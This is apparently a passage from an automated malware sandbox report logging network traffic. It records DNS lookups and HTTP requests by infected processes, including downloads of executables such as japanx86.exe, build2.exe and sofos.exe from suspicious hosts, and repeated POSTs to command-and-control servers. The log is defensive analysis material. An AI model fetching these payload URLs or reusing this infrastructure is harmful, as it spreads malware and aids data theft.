                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 675502
                                                                                                                                                                      x-request-id: 83b3b3dd-ec66-4156-a534-b0b42f79f624
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44590
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 865215-1540716/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=1540717-3602164
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 2061448
                                                                                                                                                                      x-request-id: 4d600038-42c6-4ede-8ee5-d268006aa1d5
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44591
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 1540717-3602164/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=3602165-6406947
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 2804783
                                                                                                                                                                      x-request-id: d02f0bae-f26d-47b1-92ae-947268eced2b
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44592
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 3602165-6406947/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=6406948-6760941
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 353994
                                                                                                                                                                      x-request-id: e1af7da4-8a7d-42b9-acf2-18c037d54932
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44594
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 6406948-6760941/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.163
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      beacons-handoff.gcp.gvt2.com
                                                                                                                                                                      beacons-handoff.gcp.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.99
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.206
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.206
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.113
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.74
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.91
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.54
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.74
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.113
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.54
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.91
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.188.37.165
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.216.1.172
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.39.83.8
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.217.225.174
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.191.242.132
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.239.99.67
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.167.190.17
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.225.144.144
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.188.37.165
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.39.83.8
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.167.135.90
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.239.32.116
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.239.32.116
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.217.225.174
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.161.212.132
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.210.132.209
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.239.99.67
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.167.135.90
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.191.242.132
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.200.228.111
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.167.135.90
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.210.132.209
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.188.37.165
                                                                                                                                                                    • 188.114.96.0:80
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      http
                                                                                                                                                                      355.4kB
                                                                                                                                                                      19.0MB
                                                                                                                                                                      7313
                                                                                                                                                                      13663

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 194.110.203.101:80
                                                                                                                                                                      http://194.110.203.101/puta/japanx86.exe
                                                                                                                                                                      http
                                                                                                                                                                      8.0kB
                                                                                                                                                                      450.2kB
                                                                                                                                                                      170
                                                                                                                                                                      328

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://194.110.203.101/puta/japanx86.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 95.217.49.230:443
                                                                                                                                                                      https://polyzi.com/systems/ChromeSetup.exe
                                                                                                                                                                      tls, http
                                                                                                                                                                      6.7kB
                                                                                                                                                                      352.5kB
                                                                                                                                                                      136
                                                                                                                                                                      260

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://polyzi.com/systems/ChromeSetup.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 104.80.225.205:443
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 91.215.85.155:32796
                                                                                                                                                                      E738.exe
                                                                                                                                                                      9.6kB
                                                                                                                                                                      6.3kB
                                                                                                                                                                      27
                                                                                                                                                                      23
                                                                                                                                                                    • 91.215.85.155:32796
                                                                                                                                                                      E95C.exe
                                                                                                                                                                      7.4kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      24
                                                                                                                                                                      19
                                                                                                                                                                    • 52.182.143.208:443
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 162.0.217.254:443
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      tls, http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      1.0kB
                                                                                                                                                                      8.1kB
                                                                                                                                                                      14
                                                                                                                                                                      10

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://api.2ip.ua/geo.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      429
                                                                                                                                                                    • 162.0.217.254:443
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      tls, http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      1.2kB
                                                                                                                                                                      8.2kB
                                                                                                                                                                      17
                                                                                                                                                                      12

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://api.2ip.ua/geo.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      429
                                                                                                                                                                    • 190.219.54.242:80
                                                                                                                                                                      http://uaery.top/dl/build2.exe
                                                                                                                                                                      http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      15.7kB
                                                                                                                                                                      453.6kB
                                                                                                                                                                      339
                                                                                                                                                                      338

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://uaery.top/dl/build2.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 195.158.3.162:80
                                                                                                                                                                      http://spaceris.com/lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true
                                                                                                                                                                      http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      417 B
                                                                                                                                                                      979 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://spaceris.com/lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 195.158.3.162:80
                                                                                                                                                                      http://spaceris.com/files/1/build3.exe
                                                                                                                                                                      http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      649 B
                                                                                                                                                                      10.5kB
                                                                                                                                                                      12
                                                                                                                                                                      11

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://spaceris.com/files/1/build3.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 82.115.223.77:8081
                                                                                                                                                                      venuzye.exe
                                                                                                                                                                      372.3kB
                                                                                                                                                                      6.1kB
                                                                                                                                                                      299
                                                                                                                                                                      151
                                                                                                                                                                    • 8.248.5.254:80
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 8.248.5.254:80
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 8.248.5.254:80
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 149.154.167.99:443
                                                                                                                                                                      https://t.me/year2023start
                                                                                                                                                                      tls, http
                                                                                                                                                                      build2.exe
                                                                                                                                                                      1.5kB
                                                                                                                                                                      19.5kB
                                                                                                                                                                      24
                                                                                                                                                                      20

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://t.me/year2023start

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 49.12.113.110:80
                                                                                                                                                                      http://49.12.113.110/
                                                                                                                                                                      http
                                                                                                                                                                      build2.exe
                                                                                                                                                                      257.9kB
                                                                                                                                                                      1.6MB
                                                                                                                                                                      1314
                                                                                                                                                                      1202

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://49.12.113.110/19

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://49.12.113.110/samefiles.zip

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://49.12.113.110/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      757 B
                                                                                                                                                                      465 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      833 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      659 B
                                                                                                                                                                      501 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 146.19.173.115:80
                                                                                                                                                                      http://146.19.173.115/sofos.exe
                                                                                                                                                                      http
                                                                                                                                                                      19.7kB
                                                                                                                                                                      1.2MB
                                                                                                                                                                      424
                                                                                                                                                                      827

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://146.19.173.115/sofos.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      715 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

